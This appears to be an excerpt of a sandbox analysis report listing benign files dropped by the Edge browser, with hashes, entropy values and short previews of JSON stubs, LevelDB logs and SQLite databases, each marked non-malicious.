                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\74322765-9b63-43c1-8ab9-e1397295eac7.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\7cdad906-5b81-4e2e-a2f8-a3990d0a2cf7.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):111
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                                                        MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                                                        SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                                                        SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                                                        SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3caf2.TMP (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3cf57.TMP (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                                        MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                                        SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                                        SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                                        SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):80
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                                        MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                                        SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                                        SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                                        SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):426
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.225919187488528
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:7bCvVaYebvqBZFUt8Ov4/+Ov5OaYebvqBaJ:7bIVaYebvyg8OvYhOaYebvL
                                                                                                                                                                                                                                                                                                                        MD5:B2AE2C65E6AC5CF3B5F3DBF247073259
                                                                                                                                                                                                                                                                                                                        SHA1:78E7F44EDF2A7A67550EC912F2BF0BFF8A799D27
                                                                                                                                                                                                                                                                                                                        SHA-256:889732F526B3A5BB485CF7EA25C54F65D81320B22791375155F73EE9E2F3390E
                                                                                                                                                                                                                                                                                                                        SHA-512:10B78145A7273E056161528F831D0804D25492092B8A3CF94927F45E0B6C9234053B4F3ADED43EF491D64999EBC321DAB77C37ED093A236DA2BD9387A008E24F
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:44.538 1d98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/10-12:40:44.539 1d98 Recovering log #3.2024/12/10-12:40:44.543 1d98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):426
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.225919187488528
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:7bCvVaYebvqBZFUt8Ov4/+Ov5OaYebvqBaJ:7bIVaYebvyg8OvYhOaYebvL
                                                                                                                                                                                                                                                                                                                        MD5:B2AE2C65E6AC5CF3B5F3DBF247073259
                                                                                                                                                                                                                                                                                                                        SHA1:78E7F44EDF2A7A67550EC912F2BF0BFF8A799D27
                                                                                                                                                                                                                                                                                                                        SHA-256:889732F526B3A5BB485CF7EA25C54F65D81320B22791375155F73EE9E2F3390E
                                                                                                                                                                                                                                                                                                                        SHA-512:10B78145A7273E056161528F831D0804D25492092B8A3CF94927F45E0B6C9234053B4F3ADED43EF491D64999EBC321DAB77C37ED093A236DA2BD9387A008E24F
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:44.538 1d98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/10-12:40:44.539 1d98 Recovering log #3.2024/12/10-12:40:44.543 1d98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):332
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.060571760522614
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7L8jQ+q2PN723oH+TcwtpIFUt8OL8hgZmw+OL8hQVkwON723oH+Tcwta/WLJ:7A8+vVaYebmFUt8OA+/+OA6V5OaYebaQ
                                                                                                                                                                                                                                                                                                                        MD5:6399EEFE8080ECA389DE05AF0E8DDC85
                                                                                                                                                                                                                                                                                                                        SHA1:E710EBD74B4B7DE7BFB00F70056A851FFEAF4689
                                                                                                                                                                                                                                                                                                                        SHA-256:4274561B8B17D3C1AEBCC5A5F3088E641C92C6B10139A6B92AAC6579366129F2
                                                                                                                                                                                                                                                                                                                        SHA-512:B44E0FD92F6F02614CD7E45E9F491BB3A9CE8F3568A95273536297CCCF73BC12AFFC9716214845FF71E6FABAB84824B724186F318B826A27DCB109D438DA104F
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:24.010 1cdc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/10-12:40:24.012 1cdc Recovering log #3.2024/12/10-12:40:24.012 1cdc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):332
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.060571760522614
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7L8jQ+q2PN723oH+TcwtpIFUt8OL8hgZmw+OL8hQVkwON723oH+Tcwta/WLJ:7A8+vVaYebmFUt8OA+/+OA6V5OaYebaQ
                                                                                                                                                                                                                                                                                                                        MD5:6399EEFE8080ECA389DE05AF0E8DDC85
                                                                                                                                                                                                                                                                                                                        SHA1:E710EBD74B4B7DE7BFB00F70056A851FFEAF4689
                                                                                                                                                                                                                                                                                                                        SHA-256:4274561B8B17D3C1AEBCC5A5F3088E641C92C6B10139A6B92AAC6579366129F2
                                                                                                                                                                                                                                                                                                                        SHA-512:B44E0FD92F6F02614CD7E45E9F491BB3A9CE8F3568A95273536297CCCF73BC12AFFC9716214845FF71E6FABAB84824B724186F318B826A27DCB109D438DA104F
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:24.010 1cdc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/10-12:40:24.012 1cdc Recovering log #3.2024/12/10-12:40:24.012 1cdc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):131072
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0033769341339387224
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:ImtVuXhLOOlwB:IiVuxkB
                                                                                                                                                                                                                                                                                                                        MD5:DC091170E313ADE4A142D773BC337F9B
                                                                                                                                                                                                                                                                                                                        SHA1:5D04AFF4306B86FD04A9DAAAC2618BFB78391C28
                                                                                                                                                                                                                                                                                                                        SHA-256:FFA3CEA85155AED298C1C7BE95F2BE9B92CA4FDAA3097D756820EF6202EFEC0E
                                                                                                                                                                                                                                                                                                                        SHA-512:0361F83AD992E3362DE5323D6B868C06AF856C7E7446D5B2AD4FEF62D7449B12951EC11B3CCDE6E118688448B909BFF7E0C3B769EBB78C3AE86F7A27DDA142DA
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:VLnk.....?........A..Z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.267837558455539
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:384:L/2qOB1nxCkMoSA1LyKOMq+8iP5GDHP/0jMVumG:Kq+n0Jo91LyKOMq+8iP5GLP/0D
                                                                                                                                                                                                                                                                                                                        MD5:C64D4A71E494B5A12EE39BE124BA33CB
                                                                                                                                                                                                                                                                                                                        SHA1:DE4C027FC6A7C4EEF414DE213FF44A97A908E7C7
                                                                                                                                                                                                                                                                                                                        SHA-256:B4D0DBAE97884406549F93A02F12B4758CE456CAD64910B0412A5241B53A1F64
                                                                                                                                                                                                                                                                                                                        SHA-512:647CC55A1AA7C5DEC520B31E2F5ABF8EC2F9341531BDD040838883272CEF425774B0F3ABD6F5021B63BA52CEDDDFCDC930C6330182332E685DE6DE8ED5C68CFE
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data-journal

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2568
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.06569804787746028
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:59l1l3/PlV:5//D
                                                                                                                                                                                                                                                                                                                        MD5:3B2D88B49FD3B07E6A70C51A4ECAC045
                                                                                                                                                                                                                                                                                                                        SHA1:770E29D058DEA9BA324657A34239133AE6CB9257
                                                                                                                                                                                                                                                                                                                        SHA-256:2491457E09BC0B3C8314659087DFC153E6E8097B1824C81A0385661BBCE55A41
                                                                                                                                                                                                                                                                                                                        SHA-512:BFEF23EE10646464F1AD59742515E05EE5CED4AE60BC5FE916FB72202196F79195742BC7D2BF4F5F4050C8EA898AACBAE9389CE13DE0CE89CD6D9A1AC9340AB1
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:............1."%...`.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.41235120905181716
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB:v7doKsKuKZKlZNmu46yjx
                                                                                                                                                                                                                                                                                                                        MD5:981F351994975A68A0DD3ECE5E889FD0
                                                                                                                                                                                                                                                                                                                        SHA1:080D3386290A14A68FCE07709A572AF98097C52D
                                                                                                                                                                                                                                                                                                                        SHA-256:3F0C0B2460E0AA2A94E0BF79C8944F2F4835D2701249B34A13FD200F7E5316D7
                                                                                                                                                                                                                                                                                                                        SHA-512:C5930797C46EEC25D356BAEB6CFE37E9F462DEE2AE8866343B2C382DBAD45C1544EF720D520C4407F56874596B31EFD6822B58A9D3DAE6F85E47FF802DBAA20B
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ae48e9de-e3c1-4803-9b0f-98aeb85f76ec.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):13276
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.264207279504586
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:192:stQJ99QTryDiTbatSuyiskCUaFvrEVL9Rk3V3z82bV+FiAd2O436P/hYJ:stQPGoSufskXCDwL92bGiG2O431
                                                                                                                                                                                                                                                                                                                        MD5:60C582463DE746D93F26B3303356FF9E
                                                                                                                                                                                                                                                                                                                        SHA1:2B3E412FD89AF305418BB715812AC838C25CBAA8
